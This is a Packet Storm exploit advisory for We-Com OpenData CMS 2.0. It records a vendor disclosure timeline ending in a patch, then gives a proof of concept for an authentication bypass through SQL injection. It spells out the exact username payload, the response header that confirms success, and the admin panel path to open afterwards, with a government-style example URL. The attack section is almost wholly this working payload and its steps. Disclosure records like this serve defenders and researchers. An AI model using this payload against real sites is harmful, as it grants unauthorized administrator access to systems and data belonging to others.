We-Com OpenData CMS 2.0 SQL Injection

2020-06-01T00:00:00
ID PACKETSTORM:157887
Type packetstorm
Reporter thelastvvv
Modified 2020-06-01T00:00:00

Description

                                        
                                            `# Exploit Title: We-com OpenData CMS 2.0 Authentication Bypass / SQL Injection  
# Google Dork:N/A  
# Date: 2020-04-17  
# Exploit Author: @ThelastVvV  
# Vendor Homepage: https://www.we-com.it/  
# Version: 2.0  
# Tested on: 5.5.0-kali1-amd64  
  
  
---------------------------------------------------------  
  
  
Vendor contact timeline:  
  
  
2020-05-05: Contacting vendor through info@we-com.it  
2020-05-26: A Patch is published in the version  
2020-06-01: Release of security advisory  
  
  
  
  
Authentication Bypass / SQL Injection in the opendata 2.0 CMS  
  
PoC:  
  
Payload(s)  
USERNAME: admin' or '1' = '1'; -- -   
  
PASSWORD: vvv  
  
the SQL injection attack has resulted in a bypass of the login,to confirm you will get a reponse in header of the page with "okokokokokokokokokokokokokok"  
  
But will not redirect you to the control panel so you wil need to do it manual   
  
https://www.site.gov.it/admin/?mod=mod_admin  
  
and we are now authenticated as "adminstrator".  
  
  
`